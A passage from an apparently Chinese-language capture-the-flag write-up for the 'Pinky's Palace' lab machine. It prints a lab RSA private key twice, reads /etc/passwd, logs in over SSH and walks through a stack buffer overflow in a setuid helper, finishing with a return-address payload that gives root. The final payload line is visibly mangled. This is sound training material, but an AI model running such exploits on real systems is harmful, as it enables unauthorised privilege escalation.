QUJBb0lCQUE2aUg3U0lhOTRQcDRLeApXMUx0cU9VeEQzRlZ3UGNkSFJidG5YYS80d3k0dzl6M1Mv
WjkxSzBrWURPbkEwT1VvWHZJVmwvS3JmNkYxK2lZCnJsZktvOGlNY3UreXhRRXRQa291bDllQS9r
OHJsNmNiWU5jYjNPbkRmQU9IYWxYQVU4TVpGRkF4OWdrY1NwejYKNkxPdWNOSUp1eS8zUVpOSEZo
TlIrWVJDb0RLbkZuRUlMeFlMNVd6MnFwdFdNWUR1d3RtR3pPOTY4WWJMck9WMQpva1dONmdNaUVp
NXFwckJoNWE4d0JSUVZhQnJMWVdnOFdlWGZXZmtHektveEtQRkt6aEk1ajQvRWt4TERKcXQzCkxB
N0pSeG1Gbjc3L21idmFEVzhXWlgwZk9jUzh1Z3lSQkVOMFZwZG5GNmtsNnRmT1hLR2owZ2QrZ0Fp
dzBUVlIKMkNCN1BzRUNnWUVBOElXM1pzS3RiQ2tSQnRGK1ZUQnE0SzQ2czdTaFc5QVo2K2JwYitk
MU5SVDV4UkpHK0RzegpGM2NnNE4rMzluWWc4bUZ3c0Jobi9zemdWQk5XWm91V3JSTnJERXhIMHl1
NkhPSjd6TFdRYXlVaFFKaUlQeHBjCm4vRWVkNlNyY3lTZnpnbW50T2liNGh5R2pGMC93bnRqTWM3
M3h1QVZOdU84QTZXVytoZ1ZIS0VDZ1lFQTVZaVcKSzJ2YlZOQnFFQkNQK3hyQzVkSE9CSUVXdjg5
QkZJbS9Gcy9lc2g4dUU1TG5qMTFlUCsxRVpoMkZLOTJReDlZdgp5MWJNc0FrZitwdEZVSkxjazFN
MjBlZkFhU3ZPaHI1dWFqbnlxQ29mc1NVZktaYWE3blBRb3plcHFNS1hHTW95Ck1FRWVMT3c1NnNK
aFNwMFVkWHlhejlGUUFtdnpTWFVudW8xdCtnTUNnWUVBdWJ4NDJXa0NwU0M5WGtlT3lGaGcKWUdz
TE45VUlPaTlrcFJBbk9seEIzYUQ2RkY0OTRkbE5aaFIvbGtnTTlzMVlPZlJYSWhWbTBaUUNzOHBQ
RVZkQQpIeDE4ci8yRUJhV2h6a1p6bGF5ci9xR29vUXBwUkZtbUozajZyeWZCb21RbzUrSDYyVEE3
bUl1d3Qxb1hMNmM2Ci9hNjNGcVBhbmcyVkZqZmNjL3IrNnFFQ2dZQStBenJmSEZLemhXTkNWOWN1
ZGpwMXNNdENPRVlYS0QxaStSd2gKWTZPODUrT2c4aTJSZEI1RWt5dkprdXdwdjhDZjNPUW93Wmlu
YnErdkcwZ016c0M5Sk54SXRaNHNTK09PVCtDdwozbHNLeCthc0MyVng3UGlLdDh1RWJVTnZEck9Y
eFBqdVJJbU1oWDNZU1EvVUFzQkdSWlhsMDUwVUttb2VUSUtoClNoaU9WUUtCZ1FEc1M0MWltQ3hX
Mm1lNTQxdnR3QWFJcFE1bG81T1Z6RDJBOXRlRVBzVTZGMmg2WDdwV1I2SVgKQTlycExXbWJmeEdn
SjBNVmh4Q2pwZVlnU0M4VXNkTXpOYTJBcGN3T1dRZWtORTRlTHRPN1p2MlNWRHI2Y0lyYwpIY2NF
UCtNR00yZVVmQlBua2FQa2JDUHI3dG5xUGY4ZUpxaVFVa1dWaDJDbll6ZUFIcjVPbUE9PQotLS0t
LUVORCBSU0EgUFJJVkFURSBLRVktLS0tLQo=" | base64 -d
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEA16fxL3/+h/ILTZewkvekhIQ1yk0oLI+y3N4AItkhez11Iha8
Hc7KOx/L9g2jd3H8dGPUfKKr9seqtg97ZKA95S/sb4w3Qtl1ABu/pVKZBbGGsHG/
yIvGEPKS+BSZ4stMW7Hnx7ciMuhwcZwLqZmsySumECTueQswNPblITlrqolpYF8x
e47El9pHwewNWcIrmqraxCH5TC7UhjgGaQwmW3qHyrSqp/jK/ctb1ZpnPv+DC833
u/Tyjm6z8RaDZG/gRBIrMGnNbg4pZFhtgbGVOf7feGvBFR8BiT+7VFfO7yEvyBx9
gxrySxu2Z0aOM8QR6MGaDMjYUnB9aTYuw8GP4wIDAQABAoIBAA6iH7SIa94Pp4Kx
W1LtqOUxD3FVwPcdHRbtnXa/4wy4w9z3S/Z91K0kYDOnA0OUoXvIVl/Krf6F1+iY
rlfKo8iMcu+yxQEtPkoul9eA/k8rl6cbYNcb3OnDfAOHalXAU8MZFFAx9gkcSpz6
6LOucNIJuy/3QZNHFhNR+YRCoDKnFnEILxYL5Wz2qptWMYDuwtmGzO968YbLrOV1
okWN6gMiEi5qprBh5a8wBRQVaBrLYWg8WeXfWfkGzKoxKPFKzhI5j4/EkxLDJqt3
LA7JRxmFn77/mbvaDW8WZX0fOcS8ugyRBEN0VpdnF6kl6tfOXKGj0gd+gAiw0TVR
2CB7PsECgYEA8IW3ZsKtbCkRBtF+VTBq4K46s7ShW9AZ6+bpb+d1NRT5xRJG+Dsz
F3cg4N+39nYg8mFwsBhn/szgVBNWZouWrRNrDExH0yu6HOJ7zLWQayUhQJiIPxpc
n/Eed6SrcySfzgmntOib4hyGjF0/wntjMc73xuAVNuO8A6WW+hgVHKECgYEA5YiW
K2vbVNBqEBCP+xrC5dHOBIEWv89BFIm/Fs/esh8uE5Lnj11eP+1EZh2FK92Qx9Yv
y1bMsAkf+ptFUJLck1M20efAaSvOhr5uajnyqCofsSUfKZaa7nPQozepqMKXGMoy
MEEeLOw56sJhSp0UdXyaz9FQAmvzSXUnuo1t+gMCgYEAubx42WkCpSC9XkeOyFhg
YGsLN9UIOi9kpRAnOlxB3aD6FF494dlNZhR/lkgM9s1YOfRXIhVm0ZQCs8pPEVdA
Hx18r/2EBaWhzkZzlayr/qGooQppRFmmJ3j6ryfBomQo5+H62TA7mIuwt1oXL6c6
/a63FqPang2VFjfcc/r+6qECgYA+AzrfHFKzhWNCV9cudjp1sMtCOEYXKD1i+Rwh
Y6O85+Og8i2RdB5EkyvJkuwpv8Cf3OQowZinbq+vG0gMzsC9JNxItZ4sS+OOT+Cw
3lsKx+asC2Vx7PiKt8uEbUNvDrOXxPjuRImMhX3YSQ/UAsBGRZXl050UKmoeTIKh
ShiOVQKBgQDsS41imCxW2me541vtwAaIpQ5lo5OVzD2A9teEPsU6F2h6X7pWR6IX
A9rpLWmbfxGgJ0MVhxCjpeYgSC8UsdMzNa2ApcwOWQekNE4eLtO7Zv2SVDr6cIrc
HccEP+MGM2eUfBPnkaPkbCPr7tnqPf8eJqiQUkWVh2CnYzeAHr5OmA==
-----END RSA PRIVATE KEY-----

---

密钥就是

-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEA16fxL3/+h/ILTZewkvekhIQ1yk0oLI+y3N4AItkhez11Iha8
Hc7KOx/L9g2jd3H8dGPUfKKr9seqtg97ZKA95S/sb4w3Qtl1ABu/pVKZBbGGsHG/
yIvGEPKS+BSZ4stMW7Hnx7ciMuhwcZwLqZmsySumECTueQswNPblITlrqolpYF8x
e47El9pHwewNWcIrmqraxCH5TC7UhjgGaQwmW3qHyrSqp/jK/ctb1ZpnPv+DC833
u/Tyjm6z8RaDZG/gRBIrMGnNbg4pZFhtgbGVOf7feGvBFR8BiT+7VFfO7yEvyBx9
gxrySxu2Z0aOM8QR6MGaDMjYUnB9aTYuw8GP4wIDAQABAoIBAA6iH7SIa94Pp4Kx
W1LtqOUxD3FVwPcdHRbtnXa/4wy4w9z3S/Z91K0kYDOnA0OUoXvIVl/Krf6F1+iY
rlfKo8iMcu+yxQEtPkoul9eA/k8rl6cbYNcb3OnDfAOHalXAU8MZFFAx9gkcSpz6
6LOucNIJuy/3QZNHFhNR+YRCoDKnFnEILxYL5Wz2qptWMYDuwtmGzO968YbLrOV1
okWN6gMiEi5qprBh5a8wBRQVaBrLYWg8WeXfWfkGzKoxKPFKzhI5j4/EkxLDJqt3
LA7JRxmFn77/mbvaDW8WZX0fOcS8ugyRBEN0VpdnF6kl6tfOXKGj0gd+gAiw0TVR
2CB7PsECgYEA8IW3ZsKtbCkRBtF+VTBq4K46s7ShW9AZ6+bpb+d1NRT5xRJG+Dsz
F3cg4N+39nYg8mFwsBhn/szgVBNWZouWrRNrDExH0yu6HOJ7zLWQayUhQJiIPxpc
n/Eed6SrcySfzgmntOib4hyGjF0/wntjMc73xuAVNuO8A6WW+hgVHKECgYEA5YiW
K2vbVNBqEBCP+xrC5dHOBIEWv89BFIm/Fs/esh8uE5Lnj11eP+1EZh2FK92Qx9Yv
y1bMsAkf+ptFUJLck1M20efAaSvOhr5uajnyqCofsSUfKZaa7nPQozepqMKXGMoy
MEEeLOw56sJhSp0UdXyaz9FQAmvzSXUnuo1t+gMCgYEAubx42WkCpSC9XkeOyFhg
YGsLN9UIOi9kpRAnOlxB3aD6FF494dlNZhR/lkgM9s1YOfRXIhVm0ZQCs8pPEVdA
Hx18r/2EBaWhzkZzlayr/qGooQppRFmmJ3j6ryfBomQo5+H62TA7mIuwt1oXL6c6
/a63FqPang2VFjfcc/r+6qECgYA+AzrfHFKzhWNCV9cudjp1sMtCOEYXKD1i+Rwh
Y6O85+Og8i2RdB5EkyvJkuwpv8Cf3OQowZinbq+vG0gMzsC9JNxItZ4sS+OOT+Cw
3lsKx+asC2Vx7PiKt8uEbUNvDrOXxPjuRImMhX3YSQ/UAsBGRZXl050UKmoeTIKh
ShiOVQKBgQDsS41imCxW2me541vtwAaIpQ5lo5OVzD2A9teEPsU6F2h6X7pWR6IX
A9rpLWmbfxGgJ0MVhxCjpeYgSC8UsdMzNa2ApcwOWQekNE4eLtO7Zv2SVDr6cIrc
HccEP+MGM2eUfBPnkaPkbCPr7tnqPf8eJqiQUkWVh2CnYzeAHr5OmA==
-----END RSA PRIVATE KEY-----

---

pinkymanage@pinkys-palace:/var/www/html/littlesecrets-main/ultrasecretadminf1l35$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:x:104:65534::/nonexistent:/bin/false
messagebus:x:105:109::/var/run/dbus:/bin/false
pinky:x:1000:1000:pinky,,,:/home/pinky:/bin/bash
mysql:x:106:111:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:107:65534::/run/sshd:/usr/sbin/nologin
pinkymanage:x:1001:1001:pinkymanage,,,:/home/pinkymanage:/bin/bash



pinkymanage@pinkys-palace:/var/www/html/littlesecrets-main/ultrasecretadminf1l35$ cat /etc/passwd | grep /bin/.*sh
root:x:0:0:root:/root:/bin/bash
pinky:x:1000:1000:pinky,,,:/home/pinky:/bin/bash
pinkymanage:x:1001:1001:pinkymanage,,,:/home/pinkymanage:/bin/bash


pinkymanage@pinkys-palace:/var/www/html/littlesecrets-main/ultrasecretadminf1l35$ sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for pinkymanage:

pinkymanage用户没有sudo权限！

---

pinky用户登录

┌──(root㉿ru)-[~/kali]
└─# ssh -i pinky_key pinky@192.168.169.63 -p 64666
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@         WARNING: UNPROTECTED PRIVATE KEY FILE!          @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for 'pinky_key' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "pinky_key": bad permissions
pinky@192.168.169.63's password:

---

出现这种情况是因为密钥的权限太高了！我们给它600权限即可！

---

┌──(root㉿ru)-[~/kali]
└─# chmod 600 pinky_key

┌──(root㉿ru)-[~/kali]
└─# ssh -i pinky_key pinky@192.168.169.63 -p 64666
Linux pinkys-palace 4.9.0-4-amd64 #1 SMP Debian 4.9.65-3+deb9u1 (2017-12-23) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Feb  2 05:54:01 2018 from 172.19.19.2
pinky@pinkys-palace:~$ id
uid=1000(pinky) gid=1000(pinky) groups=1000(pinky),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
pinky@pinkys-palace:~$

---

pinky@pinkys-palace:~$ ls
adminhelper  note.txt
pinky@pinkys-palace:~$ cat note.txt
Been working on this program to help me when I need to do administrator tasks sudo is just too hard to configure and I can never remember my root password! Sadly I'm fairly new to C so I was working on my printing skills because Im not sure how to implement shell spawning yet :(
pinky@pinkys-palace:~$


当我需要做管理员任务时，我一直在使用这个程序来帮助我。sudo太难配置了，我永远记不起我的根密码！遗憾的是，我对C还很陌生，所以我一直在学习我的打印技能，因为我还不确定如何实现shell生成：(

---

---

根据提示，这个可执行程序应该具有打印功能。我们进行测试！

---

pinky@pinkys-palace:~$ ./adminhelper admin
admin
pinky@pinkys-palace:~$ ./adminhelper root
root
pinky@pinkys-palace:~$

---

果真如此。

缓冲区溢出漏洞

最让我头疼的漏洞......

---

pinky@pinkys-palace:~$ ./adminhelper `python -c 'print "A"*200'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Segmentation fault

提示分段故障，证实了存在缓冲区溢出问题…这边需要找出堆栈溢出值。
这个程序不返回分段错误地址，只能一点一点测试了。

---

pinky@pinkys-palace:~$ ./adminhelper `python -c 'print "A"*72'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Bus error

---

尝试了几个不同的数字后，我们得出了 72 作为缓冲区大小。现在我们需要编写一些代码，将其放在adminhelper完成正常工作后可以访问它的地方。

---

pinky@pinkys-palace:~$ gdb ./adminhelper
GNU gdb (Debian 7.12-6) 7.12.0.20161007-git
Copyright (C) 2016 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from ./adminhelper...(no debugging symbols found)...done.
(gdb) info functions
All defined functions:

Non-debugging symbols:
0x0000000000000618  _init
0x0000000000000640  strcpy@plt
0x0000000000000650  puts@plt
0x0000000000000660  execve@plt
0x0000000000000670  setegid@plt
0x0000000000000680  seteuid@plt
0x00000000000006a0  _start
0x00000000000006d0  deregister_tm_clones
0x0000000000000710  register_tm_clones
0x0000000000000760  __do_global_dtors_aux
0x00000000000007a0  frame_dummy
0x00000000000007d0  spawn
0x0000000000000813  main
0x0000000000000860  __libc_csu_init
0x00000000000008d0  __libc_csu_fini
0x00000000000008d4  _fini
(gdb)

---

使用gdb调试器调试这个程序，使用 " info functions  " 命令发现存在spawn函数。我们就利用spanwn函数进行提权。

---

---

(gdb) break main
Breakpoint 1 at 0x817
(gdb) run
Starting program: /home/pinky/adminhelper

Breakpoint 1, 0x0000555555554817 in main ()
(gdb) jump spawn
Continuing at 0x5555555547d4.
process 804 is executing new program: /bin/dash
Error in re-setting breakpoint 1: Function "main" not defined.
$ gdb --args ./adminhelper $(python -c "print 'A'*72+'B'*6")
GNU gdb (Debian 7.12-6) 7.12.0.20161007-git
Copyright (C) 2016 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from ./adminhelper...(no debugging symbols found)...done.
(gdb) run
Starting program: /home/pinky/adminhelper AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA                                                                                                                                                                          AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBB
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBB

Program received signal SIGSEGV, Segmentation fault.
0x0000424242424242 in ?? ()

---

---

运行spawn函数，我们要触发堆栈溢出从而重定向程序执行，这样会覆盖EIP中的返回地址。

然后使用payload    gdb --args ./adminhelper $(python -c “print ‘A’*72+‘B’*6”)

这边发现了42，它是B的十六进制，现在我们需要重定向执行得出内存地址！

---

---

得出目标地址是   0x00005555555547d0  ，我们将字节序列相反  （\xd0\x47\x55\x55\x55\x55）。

---

---

---

所以payload：      ./adminhelper $(python -c "print 'A'*72+'\xd0\x47\x55\x55\x55\x55"')                                                                                                                                                                      \x55\x55'")

---

---

这样我们就得到root权限以及flag了！

---